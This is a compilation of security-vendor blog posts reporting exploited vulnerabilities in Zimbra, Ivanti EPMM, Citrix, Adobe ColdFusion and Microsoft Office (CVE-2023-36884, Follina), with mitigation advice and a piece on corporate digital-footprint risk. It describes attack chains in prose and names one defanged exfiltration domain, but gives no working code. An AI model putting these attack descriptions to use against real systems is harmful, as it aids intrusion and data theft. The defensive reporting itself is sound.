Zero-day discovery was patched

A severe vulnerability has been discovered in the Zimbra email software. Four hacker groups exploited vulnerabilities to steal email data, user credentials, and tokens. According to the Google TAG research, most attacks were reported after the company published an initial patch on GitHub.

The vulnerability, CVE-2023-37580, with a CVSS score of 6.1, is a cross-site scripting (XSS) vulnerability present in versions before 8.8.15 Patch 41. The company has addressed the issue as part of the updates released on July 25, 2023. The flaw can be exploited to execute malicious scripts in a victim’s web browser via an XSS request after simply clicking a URL link. The worst part is that you don’t need to download or install anything for the attack to succeed.

Exploitation Overview

In June 2023, researchers reported multiple waves of cyber attacks. The attacks began on June 29, at least two weeks before Zimbra released the official notice. Three of the four malicious campaigns were discovered before the patch was issued. At the same time, the fourth was detected a month after the patch was published.

Greece Targeted for Email Theft. The initial exploitation targeted a government organization in Greece, employing emails with exploited URLs. Clicking the link during a Zimbra session led to the deployment of a framework documented by Volexity in February 2022. This framework utilized XSS to pilfer mail data, including emails and attachments, and set up auto-forwarding to an attacker-controlled email address.

Winter Vivern Exploits after Hotfix. Following the hotfix on July 5, an actor exploited the vulnerability for two weeks starting July 11. Multiple exploit URLs targeted government organizations in Moldova and Tunisia, attributed to the APT group Winter Vivern (UNC4907). The vulnerability facilitated the loading of malicious scripts.

Phishing Campaign in Vietnam. Days before Zimbra’s official patch, an unidentified group exploited the vulnerability in a campaign phishing for credentials in a Vietnamese government organization. The exploit URL is directed to a script displaying a phishing page for webmail credentials.

Authentication Token Theft in Pakistan. After the CVE-2023-37580 patch release, a fourth campaign targeted a government organization in Pakistan, focusing on stealing Zimbra authentication tokens, exfiltrated to ntcpk[.]org.

Safety Recommendations

As we can see, attackers often closely watch open-source repositories. Thus, they continuously look for vulnerabilities that they can exploit. In some cases, the fix for a vulnerability may already be available in the repository but not released to users.

CVE-2023-37580 could allow an attacker to steal user data or take control of user accounts. Upgrade to Zimbra Collaboration (ZCS) 8.8.15 Patch 41 or later to avoid this vulnerability. If you cannot upgrade immediately, you can mitigate the risk of this vulnerability by disabling the Zimbra Classic Web Client and using the Zimbra Web App instead.

The post Zimbra Vulnerability Exploited in the Wild appeared first on Gridinsoft Blog.

Ivanti EPMM Vulnerabilities Keep Going

On July 25, 2023 Ivanti released a note regarding the vulnerability in their EPMM device management software. They offered to install a patch to secure the software vulnerability (dubbed CVE-2023-35078) that allowed hackers to bypass authentication and access all the functionality of the app. Obviously, it received a top 10/10 CVSS rating. Bad news here is that the vulnerability was reportedly exploited since April 2023. The patch offered by the company allegedly closes the unauthorised access capabilities.

Soon after, another security loophole was discovered. CVE-2023-35081 is a path traversal vulnerability that allows for unauthorised access to the files stored on the server. Unfortunately, the scale of this breach exploitation is around the same as the previous one – hackers used them along to fulfil different targets within one attack.

Thing is, not everything is ideal for the patched 2023-35078 vulnerability. Researchers found a way to do pretty much the same trick to the patched version as hackers did earlier. The new breach is possible for older versions of the EPMM – 11.2 and below – and received an index of CVE-2023-35082. Even after the patch, applications were not able to provide a sustainable security level. Fortunately, no cases of exploitation of this vulnerability have been discovered yet. But as we know, once 0-day vulnerability becomes an n-day one, its usage becomes much more widespread.

How to protect against CVE-2023-35082?

The only – and the most effective advice there is updating Ivanti EPMM to any of the versions newer than 11.2. It may be troublesome to perform such an update simultaneously in a huge network of devices, though efforts there are much more preferable than efforts on fixing the outcome of a cyberattack. Though, there could be several other solutions – not preventive, but still effective.

Adopt cybersecurity solutions with zero-trust policy. The baddest modern cyberattacks are done through vulnerabilities in trusted software, the only solution is to not trust at all. EDR/XDR solutions that are built around such a conception have their downsides, apparently, but the effectiveness of their protection is undoubted. Either it is a hand-made utility or a program with over 1 million users – it will thoroughly check all the actions it does.

Use UBA and SIEM to improve visibility and response in the environment. The aforementioned zero-trust security systems will greatly appreciate additional sources of information. This is almost essential in large networks that consist of different types of devices. Being aware and being able to respond as quickly as possible is vital in modern cybersecurity, when the count can go on for minutes.

The post Ivanti EPMM Vulnerability Patch is Vulnerable appeared first on Gridinsoft Blog.

What is Ivanti Company?

Ivanti is an IT software company headquartered in Utah, United States. It produces a variety of IT management and security solutions. Many organizations use the company’s products, including businesses, government agencies, and educational institutions. For example, almost all Norwegian ministries use Ivanti Endpoint Manager Mobile except a couple of ones. Having such important clients is always a huge responsibility, and unfortunately not everyone is capable of mitigating all the risks.

Ivanti EPMM 0-day Vulnerability

ACSC has received reports of a vulnerability in Ivanti EPMM (Endpoint manager mobile), also known as MobileIron Core, affecting all versions below 11.8.1.0. In brief, the vulnerability is CVE-2023-35078 and allows remote access to the API without authentication. It has the maximum severity rating of the CVSS scale and is a 10 out of 10 possible. While Ivanti said it received the information from a reliable source, the company did not disclose any further details about the nature of the attacks or the attacker’s identity behind them. Nevertheless, the Norwegian National Security Authority (NSM) confirmed that unknown attackers exploited the vulnerability to attack the State Organization for Security and Services (DSS). Thus, attackers could likely access and steal sensitive data from the compromised platform.

However, on Sunday, the company released a security patch that users can install by upgrading to EPMM 11.8.1.1, 11.9.1.1.1, and 11.10.0.2. However, versions below 11.8.1.0 that are outdated and unsupported have also received the update.

CVE-2023-35078 Details

CVE-2023-35078 is a zero-day authentication bypass vulnerability. It provides remote API access without authentication to specific paths. That is, an attacker can access personally identifiable information such as usernames, phone numbers, and other mobile device information on the vulnerable system. An attacker can also make configuration changes, including creating an EPMM administrator account for additional changes to the vulnerable system. The vulnerability affects all supported versions of EPMM (v11.10, 11.9, and 11.8) and earlier unsupported releases. However, the vulnerability is patched in versions 11.10.0.2, 11.9.1.1, and 11.8.1.1.1. Since CVE-2023-35078 has a maximum CVSS severity level of 10.0 and is easily exploitable, experts strongly recommend updating all devices, even EOL devices. Otherwise, if you cannot update the appliance, it is recommended to switch off.

In addition, Ivanti has published a password-protected security advisory. However, only customers with login credentials can access it, which is perplexing. The company also clarified that the vulnerability is not used in a supply chain attack. IoT search engine Shodan found more than 2,900 MobileIron user portals are publicly available on the Internet, mainly in the US and Europe. About 30 of them are associated with local and state governments in the United States. The most vulnerable servers are in the US, Germany, the UK, and Hong Kong. The Norwegian National Cyber Security Center has notified all known system owners in the country that have MobileIron Core available on the Internet of a security update that has been issued.

How to secure against Ivanti 0-day vulnerability?

Well, the Norwegian government is not the only client of Ivanti. Companies from different corners of the world use their software, and appear to have a soft spot at the place no one expected. Here are some steps you can take to secure against the Ivanti 0-day vulnerability.

• Apply the latest security patches. It’s the first action you must take since Ivanti has released a patch to address the vulnerability. So, you should apply the patch as soon as possible to protect your organization.
• Use multi-factor authentication (MFA). It adds a layer of security to your organization’s IT systems. MFA requires users to use two or more pieces of identification to authenticate themselves. This way is making it more difficult for attackers to access your systems.
• Monitor your IT systems for suspicious activity. You should monitor them for suspicious activity, such as unauthorized access attempts or unusual traffic patterns. As we can see, it will help you to identify and respond to attacks.
• Educate your users about security best practices. Users are the first defense against cyberattacks. You should educate your users about safety best practices. For example, they must avoid clicking suspicious links or opening attachments from unknown senders.

By following these steps, you can help to protect your organization against the 0-day vulnerability and other cyberattacks.

The post Ivanti 0-day exploited to target Norwegian government appeared first on Gridinsoft Blog.

Citrix and Adobe Patch 0-day Vulnerabilities

Simultaneously, products of two companies were hit with critical vulnerabilities that allowed crooks the remote execution of malicious code. Citrix and Adobe are well known in the software market, so there’s no need to introduce them. The vulnerability in Citrix NetScaler has a CVSS of 9.8 out of 10, allowing for code execution without authentication. On July 18, Citrix said it had patched the vulnerabilities. However, attackers have likely had time to exploit them.

Adobe is doing a little worse in this regard. Adobe ColdFusion, a popular server-side scripting language, faces critical vulnerabilities. These vulnerabilities are noted as CVE-2023-38203 with a severity level of 9.8 out of 10 and CVE-2023-29298. This allows an unauthenticated attacker to execute arbitrary code on a vulnerable server. The company soon released a patch that was supposed to fix the vulnerabilities. However, the patch provided by Adobe for CVE-2023-29298 on July 11 is incomplete, which means that remedies against CVE-2023-29298 do not currently exist.

Moreover, experts discovered that the vulnerability that Adobe patched a few days earlier was actually CVE-2023-38203 and not CVE-2023-29300. The security company made a mistake by unintentionally releasing a critical zero-day vulnerability to users already dealing with the threat posed by the incomplete patch. Project Discovery quickly took down the disclosure post, and Adobe fixed the vulnerability two days later. By the way, the CVE-2023-29300 vulnerability also has a severity rating of 9.8.

Consequences

While estimating the potential damage from these vulnerabilities is impossible, it can be compared to the MOVEit and GoAnywhere vulnerabilities. The former resulted in 357 individual organizations being compromised, while the latter affected over 100 organizations. However, both organizations have since released patches. Meaning users can only hope the problem will be fixed soon.

How to protect against vulnerabilities?

Protecting against vulnerabilities involves adopting proactive cybersecurity measures and practices. Here are some steps you can take to enhance your security:

• Keep Software Updated. You should regularly update your operating system, applications, and antivirus software. Developers release updates to patch security vulnerabilities, so staying up-to-date is crucial.
• Use Strong Passwords. Strong passwords will help prevent compromise through brute force. In addition, consider using a password manager to store and manage your passwords securely.
• Enable Multi-Factor Authentication. Adding MFA (multi-factor authentication) provides an additional layer of security by requiring extra verification (like a code sent to your phone). It will be a different and insurmountable barrier to intruders.
• Use protection solutions. Powerful antivirus software is integral to complementing the above recommendations. In the event of an attempt to infect the system, it will neutralize the threat before it can cause harm.
• Keep Abreast of Security News. Finally, stay informed about the latest cybersecurity threats and best practices to adapt your defenses accordingly.

Although there is no such thing as 100% protection, implementing these measures can significantly reduce your risk and make it harder for attackers to exploit vulnerabilities.

The post Citrix and Adobe Vulnerabilities Under Active Exploitation appeared first on Gridinsoft Blog.

Microsoft discovered a phishing campaign conducted by a Threat Actor named Storm-0978. The targets were government and defense entities in Europe and North America. The Threat Actor used lures related to the Ukraine World Congress and exploited the vulnerability known as CVE-2023-36884.

Who is Storm-0978?

The cybercriminal group known as Storm-0978, based in Russia, is infamous for engaging in various illegal activities. These activities include conducting ransomware and extortion operations, targeted campaigns to collect credentials, developing and distributing the RomCom backdoor, and deploying the Underground Ransomware.

Underground ransomware is associated with Industrial Spy Ransomware, detected in the wild in May 2022. Microsoft identified a recent campaign in June 2023 that exploited CVE-2023-36884 to distribute a RomCom-like backdoor. This was done by a group known as Storm-0978, who use a phishing site masquerading as legitimate software to infect users. The impersonated products include Adobe products, SolarWinds Network Performance Monitor, SolarWinds Orion, Advanced IP Scanner, KeePass, and Signal. Users unwittingly download and execute files that result in the infection of the RomCom backdoor by visiting these phishing sites.

CVE-2023-36884 Exploitation

Storm-0978 conducted a phishing campaign in June 2023, using a fake OneDrive loader to deliver a backdoor similar to RomCom. The phishing emails targeted defense and government entities in Europe and North America, with lures related to the Ukrainian World Congress, and led to exploitation via CVE-2023-36884 vulnerability.

During a phishing attempt, Microsoft detected that Storm-0978 used an exploit to target CVE-2023-36884.

BlackBerry documented the attacks on guests for the upcoming NATO Summit on July 8, but the use of the zero-day in the attacks was unknown at the time.

The attackers used the RomCom variant for espionage, and Underground Ransomware was deployed for ransomware operations. The campaign indicates that Storm-0978 is a highly sophisticated group that seems to be also targeting multiple organizations in the future.

How do you avoid vulnerability?

Organizations should adopt all possible mitigation strategies until a patch is released. The vulnerability has been used in targeted attacks, and news of its existence will doubtlessly lead other attackers to attempt to replicate the exploit.

Microsoft offers performing the registry trick in order to prevent exploitation. In Regedit, go by the following path and find there FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION key.

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\

There, create REG_DWORD values with data 1 with the names of exploitable applications:

Though, patching the breach in such a way is not always enough. Hackers know about the offered fix and can find a way to revert it or exploit the breach by circumventing any registry blocks. For that reason, I also recommend having proactive and reactive security measures.

• Activate cloud-delivered protection in your antivirus software to defend against constantly changing attacker methods. Cloud-based machine learning can detect and block most new and unknown threats.
• Back up your data and store those backups offline or on a separate network for added protection. Backups are the ransomware attacks’ kryptonite, as they can do nothing if you just recover everything back.
• Wherever possible and practical, enable automatic software updates on all connected devices, including your computer and mobile phone.
• To stay safe online, it’s crucial to always verify the authenticity of links and email attachments before opening them, especially if they’re from an untrusted source.
• Use CDR solutions. CDR, or Content Disarm and Reconstruction, is the name of a content management system that aims particularly at document security. It removes active content from the document, making it impossible to exploit.

Patch CVE-2023-36884

Microsoft still needs to release a patch for CVE-2023-36884. This section will be updated as more information becomes available. However, even after a patch is found, it pays to be cautious, watch your every move on the Internet, and always follow the Zero Trust rule.

The post Microsoft CVE-2023-36884 Vulnerability Exploited in the Wild appeared first on Gridinsoft Blog.

What is Corporate Digital Footprint?

Your company’s digital footprint encompasses all its online activities, transactions, communications, marketing, and networking. This also includes those of your business partners, such as vendors and suppliers. The cloud has complicated digital footprints in recent years as it’s used for mission-critical operations, expanding their digital footprints and making them harder to define or secure. However, managing and securing your digital footprint is achievable as long as you know how to begin.

Company’s vs. Person’s Digital Footprint

A company’s digital footprint and a person’s digital footprint differ in identity, target of attacks, data volume, and consequences. For example, cyberattacks on personal digital footprints aim to compromise personal information and financial data. Conversely, attacks on a company’s digital footprint target information systems and sensitive data. Since attacks on a company’s digital footprint are more complex, they have severe consequences. It can be a loss of customer trust, financial loss, and legal problems. Understanding these differences is crucial in developing appropriate security measures to protect personal information and digital infrastructure.

Types of Digital Footprint Risk

To simplify the complex digital risk landscape, it can be divided into categories. This will assist organizations in pinpointing the most vulnerable areas of their systems and providing targeted risk protection. There are nine main categories of digital risk:

• Data Privacy. Sensitive data risks refer to any potential threats that could compromise the protection of confidential information, including personally identifiable information, financial data, and more.
• Cybersecurity. Risks associated with unauthorized access to sensitive resources and potential data breaches. These risks may be inherent or residual.
• Data Leaks. Accidental exposure of private data, known as data leaks, can potentially lead to data breaches. With the expansion of the digital landscape, there are more instances of data in use, data in transit, and data at rest. Maintaining data security is challenging under these dynamic conditions, making data leakage an unfortunate consequence of digital transformation.
• Compliance. Non-compliance risks pertain to violating regulatory compliance standards, which can lead to malpractices. Failure to comply by vendors can also impede digital risk protection efforts. Several regulatory requirements mandate complete compliance.
• Third-Party Risk. Understanding the potential risks of working with third-party vendors is essential. These risks may include vulnerabilities within the vendor’s ecosystem, breaches of security measures, failure to comply with regulations, and even theft of intellectual property.
  Cloud Technology. Some risks can affect systems, processes, and people. These risks can arise from technological incompatibilities, errors, and failures.
• Process Automation. Compatibility issues can occur when automation processes are changed or new functions are added. These issues may also affect technology risks.
• Resilience. It means maintaining critical services and operations during disruptions or risks. Risks can include server outages or data breaches. Lack of backup and recovery systems, redundant infrastructure, and disaster recovery plans to minimize downtime and restore services can paralyze an organization indefinitely.

How To Protect Your Organization’s Digital Footprint

To prevent cyber attacks, it is essential for businesses to first identify the threats. This allows them to determine what needs to be protected, how to protect it, and what risks to watch for. In a nutshell, the main issues that should be on the agenda are: “What methods are hackers currently using to attack?“, “What is encryption?“, “How can our staff spot a phishing email?“, “Are our software programs up-to-date?“, “What are our vulnerabilities?“, “Is our data stored securely?” et cetera. By staying informed, businesses can better protect themselves against cyber threats. In the following, we will look in more detail at five methods to reduce the risks.

Attack Surface Exploration

Everything is online these days. Virtually any firm or business has a website showcasing its products or services. Users can find hundreds of Web sites for everything from company to manufacturing to commerce to education to entertainment. Digital access is undoubtedly convenient, but IT professionals know it increases the risk of cyberattacks. Rapid expansion into new environments leads to technology sprawl. As a result, misconfigurations and lack of visibility increase security risks and vulnerabilities. Of course, attackers take advantage of this. We saw, during the pandemic, as many technologies were deployed hastily. As a result, many exploits targeted load balancers, cloud environments, and VPNs. However, you can increase visibility by applying some tactics, among them:

• Monitoring the latest threat intelligence and trends to understand evolving risks
• Maintaining an up-to-date asset inventory of systems, networks, applications, and devices to identify potential entry points
• Conducting regular vulnerability assessments and penetration testing exercises to find weaknesses and potential attack vectors
• Educating employees and stakeholders about cybersecurity best practices to reduce human error
• Performing thorough vendor risk assessments and monitoring the security posture of third parties as part of a holistic third-party risk management program

Using these tactics, you can strengthen your security posture and protect your valuable data.

Fast Discovery and Reaction to Vulnerabilities.

Vulnerability assessment provides a snapshot of security vulnerabilities. However, vulnerability management is a continuous process that offers real-time remediation guidance. The former involves using scanners to identify known vulnerabilities. At the same time, the latter employs multiple data sources to continually assess the situation. Vulnerability assessments identify outdated applications or operating systems and device configuration issues such as insecure ports and weak passwords. They are best suited to detect common vulnerabilities and exposures, or CVEs, listed in publicly available databases.

You can consider these six steps a continuous cycle, not a linear process. Firstly, make an asset directory and inventory all assets. Classify them by risk level and prioritize them. Arrange them based on exposure to vulnerabilities and build a security strategy. Remediate the prioritized vulnerabilities and evaluate the security strategy’s effectiveness. However, you can use continuous vulnerability scanning tools. These solutions can automatically monitor your networks, systems, and applications, quickly detecting weaknesses such as:

• Open ports
• Misconfigurations
• Outdated software

Combining this strategy with other tactics mentioned earlier will enable you to proactively identify hidden vulnerabilities, prioritize them accordingly, and allocate resources effectively to minimize risks.

Performing Cybersecurity Analysis to Find Weaknesses.

Identifying security risks and vulnerabilities is crucial to determining their root cause. By doing so, you can gain insight into the underlying factors that led to the issue and implement adequate preventive measures to avoid similar problems. It also helps to prioritize remediation efforts, allocate resources effectively, establish accountability, and improve incident response procedures. You can achieve this by conducting thorough incident investigations, analyzing system logs, and performing forensic analysis.

In addition, Business Impact Analysis (BIA) is crucial to business continuity planning. It involves identifying critical business functions and assessing their dependencies, determining Recovery Time Objectives, assessing impact, conducting a risk assessment, and developing mitigation strategies. The goal is to understand vulnerabilities, dependencies, and potential consequences of disruptions, enhancing resilience and ensuring the continuity of critical operations during adverse events. This will help not only with finding weak spots, but also motivation to improve your business’ cybersecurity.

Spot third-party risks.

According to analyses, supply chain attacks are now the most commonly used method by threat actors to access networks. Thus, research indicates that 62 percent of network intrusions stem from a third party, typically someone in your digital supply chain. Moreover, if a third-party system is breached or compromised, this can have serious consequences. It can include data breaches, service outages, and reputational harm. To prevent cyber threats, it’s essential to proactively identify third-party cyber risks, assess vendor security practices and controls, and take appropriate measures to reduce risks. Best practices in this area include:

• Conducting thorough security assessments.
• Implementing contractual agreements that enforce security requirements.
• Regularly monitoring third-party security practices.
• Establishing incident response protocols in collaboration with your vendors.

Response to Zero-Day Vulnerabilities.

Zero-day exploits cannot be identified by traditional signature-based anti-malware systems. However, a few ways to identify suspicious behavior indicate a zero-day exploit. Anti-malware vendors provide statistics on detected exploits, which can be fed into machine-learning systems for current attack identification. Signature-based detection uses digital signatures to identify variants of prior attacks. Behavior-based detection alerts for suspicious scanning and traffic on the network. A hybrid approach combines all three methods for more efficient zero-day malware discovery.

In addition, you can use EDR solutions against zero-day vulnerabilities. EDR/XDR solutions detect and respond to advanced threats, including zero-day vulnerabilities, using techniques like behavioral analysis, threat intelligence, anomaly detection, sandboxing, and rapid response. They help identify abnormal behavior patterns, attack indicators, and potential exploits while minimizing impact and awaiting a patch or remediation.

Managing and protecting your business’s digital footprint must be a priority in this dynamic digital world because your company’s overall growth and survival depend on it. The tips above will help protect your company’s valuable digital footprint from the increasingly sophisticated risks of the digital realm. Businesses must have a holistic view of their digital footprint and threat landscape. They must always consider what information is available, where it is, who can see it, how it is protected, etc. Threat awareness is an essential part of a strategy to eliminate malicious cyberattacks.

The post How to Protect Your Digital Footprint appeared first on Gridinsoft Blog.

Understanding the Follina Vulnerability

On May 27, 2022, the public became aware of a remote code execution (RCE) vulnerability, known as Follina. Soon after its disclosure, experts observed several instances of exploitation.

Follina (CVE-2022-30190) is a vulnerability identified in the Microsoft Support Diagnostic Tool (MSDT), enabling RCE on all susceptible systems. The exploitation occurs via the ms-msdt protocol handler scheme.

To exploit Follina successfully, threat actors don’t require the use of macros to entice victims. Instead, they deploy a specially crafted Word Document.

This document, through Word’s template feature, downloads and loads a malicious HTML file. Consequently, threat actors gain the ability to execute PowerShell code within targeted Windows systems.

Microsoft has issued multiple workarounds and advisories to mitigate the vulnerability’s risk.

Functioning of the Follina Vulnerability

Upon the dissemination of this vulnerability’s details online, threat actors eagerly commenced the installation of their payloads.

For a successful Follina exploit, threat actors employ HTML documents executed under WinWord. The execution initiates the msdt.exe process as a child process.

Registry protocol handler entry enables these processes. Subsequently, Sdiagnhost.exe gets activated, the Scripted Diagnostics Native Host that facilitates the creation of the final payload—in Follina’s case, PowerShell.

AsyncRAT and Browser Infostealer via Follina Vulnerability

It has been observed that threat actors deployed a diverse range of payloads in successful exploitation instances. One instance involved deploying the remote access Trojan AsyncRAT, complete with a valid digital signature.

Upon execution, this trojan verifies the presence of antivirus software. However, its primary function is to gather various system information, such as operating system details, executed paths, usernames, hardware identification, and transmit it to a command-and-control (C&C) server.

Once its task is complete, the malware awaits further commands from the C&C server and executes them on the compromised system.

Another payload instance was a browser infostealer, targeting various browser data such as saved login credentials and cookies from browsers like Edge, Chrome, and Firefox.

Patching the Follina Vulnerability

While most exploits of the vulnerability occur through malicious documents, researchers have discovered alternative methods enabling successful Follina exploitation, including manipulation of HTML content in network traffic.

“While the malicious document approach is highly concerning, the less documented methods by which the exploit can be triggered are troubling until patched,” said Tom Hegel, senior threat researcher at security firm SentinelOne. “I would expect opportunistic and targeted threat actors to use this vulnerability in a variety of ways when the option is available—it’s just too easy.”

The Follina flaw was initially noticed in August 2020 by an undergraduate researcher and reported to Microsoft on April 21. The company has proposed mitigations, including using Microsoft Defender Antivirus for monitoring and blocking exploitation and disabling a specific protocol within the Support Diagnostic Tool.

Microsoft acknowledged that the vulnerability has been exploited and has already patched the issue. However, the company is yet to classify the vulnerability as a ‘zero-day’ or previously unknown vulnerability.

APT actors utilizing the vulnerability

More alarmingly, the Follina vulnerability has been observed as part of longer infection chains. For example, security firm Proofpoint observed Chinese APT actor TA413 sending malicious URLs disguised as emails from the Central Tibetan Administration.

The vulnerability has been employed at different stages in threat actor infection chains, depending on the tactics and toolkits used.

It has been used against numerous targets in Nepal, Belarus, the Philippines, India, and Russia. Proofpoint’s vice president of threat research, Sherrod DeGrippo, identified multiple instances of vulnerability exploitation within phishing campaigns.

The vulnerability affects all supported Windows versions, Office ProPlus, Office 2021, Office 2013 through 2019, and Microsoft Office 365, receiving a 7.8 CVSS score.

Government workers impacted by the vulnerability

In addition to targeting various entities across different countries, specialists report attacks on government workers leveraging this vulnerability.

State-sponsored hackers attempted to exploit the Follina vulnerability in Microsoft Office against U.S. and E.U government targets through a phishing campaign.

So far researchers have not identified which government was behind an attack.

Malicious emails of the phishing campaign contained alluring texts promising in fake recruitment pitches 20 percent boost in salary. To learn more recipients were urged to open an accompanying email attachment.

Sherrod DeGrippo, vice president of threat research at Proofpoint in Twitter tweeted about the similar incident where about 10 company’s customers received over 1,000 messages with the same text.

The post Attackers Exploit MSDT Follina Bug to Drop RAT appeared first on Gridinsoft Blog.